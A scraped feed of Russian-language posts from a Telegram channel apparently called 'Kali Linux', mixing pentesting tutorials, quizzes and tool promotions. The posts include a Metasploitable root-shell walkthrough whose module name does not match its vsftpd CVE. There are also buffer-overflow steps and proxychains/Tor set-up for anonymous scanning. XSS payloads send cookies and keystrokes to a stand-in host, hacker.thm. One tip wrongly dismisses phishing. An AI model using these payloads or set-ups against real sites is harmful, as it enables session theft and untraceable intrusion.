Kali Linux
53.3K subscribers
1.04K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
⚜️ Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.

#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

💣Exploit

И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)


И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍257🔥6
Основы работы с proxychains.

Это очень полезное программное обеспечение, которое я буквально недавно открыл для себя.

Proxychains - программное обеспечение, которое позволяет нам проводить проксимизацию то есть использовать множественное количество прокси серверов для анонимности. Это может помочь нам скрыть свой реальный ip адрес и остаться неизвестным для тех кто захочет нас найти!

#Дисклеймер
Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#Установка
Если у Вас нету proxychains, то вы можете его установить:
sudo apt install proxychains

#Находим конфиг
Теперь настроим конфиг для работы. Поэтому пишем команду для того чтобы его найти.
locate proxycains
Первый конфиг который вы увидите будет тем, что мы ищем.

#Редактируем конфиг для корректной работы
Смело идем туда чтобы исправить что все что надо, используя любой редактор текста. Знаю что все используют Vim но я всегда пользуюсь Nano.

Sudo nano /etc/proxychains4.conf

Вам надо будет убрать знак # перед dynamic_cahin и перед proxy_dns.
В первом случае если вы не уберете решетку, то proxychains просто не будет работать.

Во втором случае proxy_dns позволит Вам проксировать ваш DNS запрос. Так как, если вы этого не сделаете, то DNS останется вашим и Вас будет элементарно вычислить не смотря на смену IP адреса.

Смысл состоит в том, чтобы добавить прокси серверы в самом конце как и написано в примере. Сначала вид протокол потом IP адрес потом порт. И если есть логин и пароль то их тоже следует добавить.

#Добавляем конечным узлом наш прокси
Однако, если вы хотите анонимно просканировать сервер с помощью nmap то лучше всего включить проксирование через TOR, но тут есть момент, что возможно, мы столкнемся с ситуацией, когда сканирование не удастся, потому что конечные точки Tor заблокированы. Поэтому добавляем туда в конец обычный прокси сервер. Чтобы Сначала траффик шел от нас по серверам тор и проходил через наш новый прокси.

#Включаем TOR

Вклюючить проксирование через TOR можно написав в конце конфига и предварительно включить TOR:
sudo service tor start

В самом конфиге в конце пишем:

socks4 127.0.0.1 9050
socks5 127.0.0.1 9050


И последним может быть ваш прокси сервер после этих двух строчек. Такие дела.

@linuxkalii
👍22🔥42😁1
✔️ Что такое XSS на основе dom.

Что такое DOM?
DOM расшифровывается как D ocument O bject M odel и представляет собой программный интерфейс для документов HTML и XML. Он представляет собой страницу, так что программы могут изменять структуру, стиль и содержимое документа. Веб-страница - это документ, и этот документ может отображаться в окне браузера или в качестве источника HTML.

Использование DOM
XSS на основе DOM - это место, где выполнение JavaScript происходит непосредственно в браузере без загрузки каких-либо новых страниц или передачи данных в серверный код. Выполнение происходит, когда код JavaScript веб-сайта воздействует на ввод или взаимодействие с пользователем.

Пример сценария:
JavaScript веб-сайта получает содержимое из window.location.hash параметра и затем записывает его на страницу в просматриваемом в данный момент разделе. Содержимое хэша не проверяется на наличие вредоносного кода, что позволяет злоумышленнику внедрить JavaScript по своему выбору на веб-страницу.


Возможное воздействие:
созданные ссылки могут быть отправлены потенциальным жертвам, перенаправляя их на другой веб-сайт или украдя контент со страницы или сеанса пользователя.

Как протестировать XSS на основе Dom:
XSS на основе DOM может быть сложной задачей для тестирования и требует определенных знаний JavaScript для чтения исходного кода. Вам нужно будет искать части кода, которые обращаются к определенным переменным, над которыми злоумышленник может иметь контроль, например, к параметрам « window.location.x ».

@linuxkalii
👍124🔥3
⚜️ Anti keystroke deanonymization tool

kloak — инструмент обеспечения приватности, который снизит эффективность сбора биометрических данных нажатия клавиш

Делается путем скрытия временных интервалов между событиями нажатия и отпускания клавиш, которые используются для идентификации и деанонимизации

Вы можете запустить kloak как самостоятельное приложение или как службу GNU/Linux

🖥 Github

#linux

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍163🔥2
💣Коротко о перезаписи буфера💣

Рассмотрим как делается перезапись буфера.
Давайте приступим к практике.

#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.

#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.

Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.

#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:

for x in range (1, 256):
print ("\x" + "{:02x}".format (x), end=")



Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)

это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.

Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯

#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.

Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).

@linuxkalii
👍184🔥2
👣 Bot Aquarium

Проект на Go для работы с Linux-контейнерами,кль управляемые искусственным интеллектом.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍6👎1🔥1
💣Изменение и модификация трафика Ч.1💣

Изменение и модификация трафика является очень важной частью Пентестинга в целом. Давайте рассмотрим с помощью чего можно производить такие манипуляции.

Burp Suite - очень важное программное обеспечение. Именно с помощью него можно пытаться эксплуатировать большое количество уязвимостей. Это П.О предоставляет возможность перехватывать траффик и изменять его, изменяя GET и POST запросы. Таким образом - это дает нам огромное количество возможностей, которыми мы можем воспользоваться.

У Burp Suite есть коммерческая версия но нам будет достаточно использование бесплатной.

У данного фрэймворка есть несколько важных функций, которыми нужно уметь пользоваться:

Прокси-сервер: самый известный аспект Burp Suite, Burp Proxy позволяет нам перехватывать и изменять запросы / ответы при взаимодействии с веб-приложениями.

Repeater: вторая наиболее известная функция Burp - Repeater - позволяет нам захватывать, изменять, а затем повторно отправлять один и тот же запрос несколько раз. Эта функция может быть абсолютно бесценна, особенно , когда мы должны выработать полезную нагрузку путем проб и ошибок для SQL инъекции.

Intruder: Данная функция помогает нам "брутфорсить" разные полезные нагрузки в то место куда нам потребуется.

Декодер: Хотя менее , чем используемый ранее упомянутые функции, декодер все еще обеспечивает ценную услугу при преобразовании данных - либо с точкой зрения декодирования собранной информации, или кодирующей полезной нагрузкой перед отправкой его на цель.

Comparer: Как следует из названия, Comparer позволяет нам сравнивать две части данных на уровне слова или байта. Опять же, это не является чем-то уникальным для Burp Suite, но возможность отправлять (потенциально очень большие) фрагменты данных непосредственно в инструмент сравнения с помощью одного сочетания клавиш может значительно ускорить процесс.

Sequencer: мы обычно используем Sequencer при оценке случайности токенов, таких как значения файлов cookie сеанса или другие предположительно сгенерированные случайным образом данные. Если алгоритм не генерирует безопасные случайные значения, это может открыть некоторые разрушительные возможности для атаки.

@linuxkalii
🔥134👍4
Kali Linux
💣Изменение и модификация трафика Ч.1💣 Изменение и модификация трафика является очень важной частью Пентестинга в целом. Давайте рассмотрим с помощью чего можно производить такие манипуляции. Burp Suite - очень важное программное обеспечение. Именно с помощью…
​​💣Изменение и модификация трафика Ч.2💣

В прошлом посте Вы узнали об основах работы с таким фреймворком как Burp Suite. Сегодня продолжим говорить на эту тему и постараемся закончить серию постов про это программное обеспечение.

Для того чтобы работать с HTTPS траффиком вам надо будет установить сертификат Burp Suite в ваш браузер. Делается это достаточно просто. Для установки надо зайти в ваш фреймворк и скачать его оттуда. После импортировать в браузер. Желательно использовать Mozilla Firefox.

Для того, чтобы было удобней настраивать свои прокси на которых работает Burp вам следует установить Foxy Proxy. С помощью этого П.О вы сможете не заходить в настройки прокси Вашего браузера для того чтобы отключить "проксирование" для Burp. Теперь это можно будет делать в один клик.

Имеет смысл понять как проводить SQL инъекции и XSS атаки а так-же обзавестись огромным количество полезных нагрузок на любой случай жизни, которые вы сможете выпускать как торпеды. Но только разумеется на CTF или если вы работаете в секторе информационной безопасности!

Подумайте про порты. Обычно такое программное обеспечение как Burp Suite стоит на портах по типу 8080 и тд. Вспомните что от настройки портов зависит ваша дальнейшая работоспособность, так как если вы где-то "протупите" то ничего работать не будет. Помните что все остальное П.О можно разместить на 8081 8082 и так далее портах.

@linuxkalii
👍7🔥32
👁‍🗨5 Советов начинающему пентестеру?👁‍🗨

🐍Огромное количество молодых людей которым интересна данная тема, не знают с чего начать и как подступиться. Сегодня я предоставлю 5 советов, которые должны вам помочь.

1. Выберите правильный обучающий ресурс. На данный момент в интернете как минимум две платформы которые помогут Вам научится хакингу. Это Tryhackme и hackthebox.

2. Как и любая другая отрасль пентестинг требует вашего времени. Тратьте его с умом. Имеет смысл отдавать все свободное время. Но если вы перестанете спать и будете только этим заниматься ваш КПД точно упадет. Знаю по себе.

3. Не слушайте специалистов по безопасности которые говорят что сейчас все атаки проводятся с помощью фишинга. Это полный бред. Такие люди по каким-то причинам хотят сбить вас с пути.

4. Всегда просите о помощи если чего-то не понимаете. Иначе будете застревать на одном моменте на несколько суток. А может быть и на неделю. Помощь - это ок!

5. Старайтесь больше практиковаться. Таким образом, вы заметите успех.

Так же хочу сказать, что зачастую у всех CTF есть свой уровень сложности. Опираясь на это, Вам следует начать с самого простого, предварительно выучив много много теории.

Вы всегда можете найти комьюнити которое может Вам помочь, достаточно задать вопрос на StuckOverflow или же в it чатах в телеграме. Помните что вы не один и все получится.

@linuxkalii
👍326🔥5
Если в директории есть файлы fileA, fileB, fileAB, fileBC и fileABC, какие из них подпадут под шаблон file[ABC]?
Anonymous Quiz
17%
fileA, fileB и fileABC
42%
fileABC
17%
fileA и fileB
24%
fileAB, fileBC и fileABC
👍14🔥63👏3😁1
🖥 NoSQLMap — Автоматизированный инструмент для баз данных NoSQL, предназначенный для аудита, а также для автоматизации атак путем внедрения и использования слабых сторон конфигурации по умолчанию в базах данных NoSQL и веб-приложениях, использующих NoSQL, для раскрытия или клонирования данных из базы данных.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥63👎1
Какая зарезервированная переменная используется для вывода общего количества параметров, переданных скрипту?
Anonymous Quiz
16%
$0
35%
$#
32%
$*
18%
$?
😁86👍5🔥4
💨 sniffer

Сниффер сетевого трафика, работающий в терминале, и предназначен для устранения неполадок в сети.

Его можно запускать в любое время для анализа процессов или соединений, вызывающих увеличение сетевого трафика, без загрузки каких-либо модулей ядра.

$ sudo apt-get install libpcap-dev

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥63🤔1
⚜️ ZAP Сканнер уязвимостей

Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.

#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.


Почему бы мне не использовать Burp Suite?

Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.

#Преимущества OWASP ZAP?

Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.


#Установка

OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.

Скачайте и установите с официального сайта: https://www.zaproxy.org/download/

#Автоматичесское сканирование

Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.

ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.

#Ручное сканирование

Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.

На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🔥64
👁‍🗨DNS в деталях

Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.

Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.

Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.

1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.

Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.

Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов

@linuxkalii
👍18🔥31👎1
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки

Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер


⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍82
📃Основы повышения привилегий

Сегодня речь пойдет о повышении привилегий на Linux системах.

Чтобы сразу не углубляться в дебри, имеет смысл сказать, что есть администратор (root) и другие пользователи, имена у которых могут быть разные. Зависит от воображения.

Пользователи делятся на группы, котором администратор назначает доступ к различным файлам и командам. Нас интересует команда sudo.

Sudo (англ. Substitute User and do, дословно «подменить пользователя и выполнить») — программа для системного администрирования UNIX-систем, позволяющая делегировать те или иные привилегированные ресурсы пользователям с ведением протокола работы.

Например:
Sudo whoami. Данная команда запустит команду whoami от лица root пользователя, которую в свою очередь скажет нам, "под каким" пользователем мы находимся в системе.

Смысл заключается в том, что мы можем эксплуатировать не правильные системные настройки или же версию ядра для получения более высоких привилегий в системе. Об этом я расскажу чуть позже. Важно понять азы.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍61
🔥 Полезные библиотеки Python

Osintgram
- инструмент OSINT в Instagram для сбора, анализа и проведения разведки пользователя по нику. Предлагает широкий спектр методов.

⚙️ Инструкция по установке/использованию 👇

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍161🔥1
5 визуально эффектных программ для командной строки

Многие из нас уже имели дело с командной строкой. Этот классический текстовый интерфейс позволяет выполнять все необходимые задачи, с которыми не справляется GUI. Иногда работа с терминалом требует максимального погружения.

Любой универсальный разработчик должен владеть основными навыками использования командной строки: освоить принцип работы, научиться редактировать файлы, настраивать приложения и т.д. При этом совсем необязательно работать с черно-белым скучным интерфейсом. Почему бы не воспользоваться интересными и визуально эффектными программами для командной строки, которые обновляют ее внешнюю эстетику?

В статье мы проведем обзор сторонних программ, которые улучшают внешний вид консоли. И пусть совершенные функциональные возможности и производительность не входят в число главных приоритетов таких программ, зато они взрывают унылый интерфейс буйством красок.

Читать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍63
👺 TorghostNG — инструмент написанный на Python, который в пару команд позволяет пустит весь ваш трафик через сеть Tor.

Установка:
$ git clone https://github.com/githacktools/TorghostNG
$ cd TorghostNG
$ sudo python3 install.py

Использование:
$ sudo torghostng

⚙️ GitHub/Инструкция

#python #soft #github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍174🔥4
XSS уязвимости на примере

Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!

#Что такое XSS
XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.

#Полезная нагрузка
Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.

1. Кража сеанса:
Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.

💣<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>


2. Key Logger:
Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей.

💣<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

#Reflected XSS
Всего бывают три вида XSS. Это reflected dom и stored. Давайте кратко рассмотрим первый вид.
Reflected xss это вид межсайтового скриптинга, в котором внедренный скрипт выполняется на стороне пользователя или же клиента. То есть, вы можете вывести слово или цифру с помощью строчки кода и если вы скинете ссылку человеку и он перейдет по ней, у него будет та же надпись что и у Вас.

Злоумышленник может отправлять ссылки или встраивать их в iframe на другом веб-сайте, содержащем полезную нагрузку JavaScript, потенциальным жертвам, заставляя их выполнить код в своем браузере, потенциально раскрывая информацию о сеансе или о клиенте.

После того как уязвимость найдена Злоумышленник может подключить программное обеспечение, которое упростит ему работу с кодом, просто нажав пару раз мышкой по интерфейсу программы.

@linuxkalii
👍163🔥3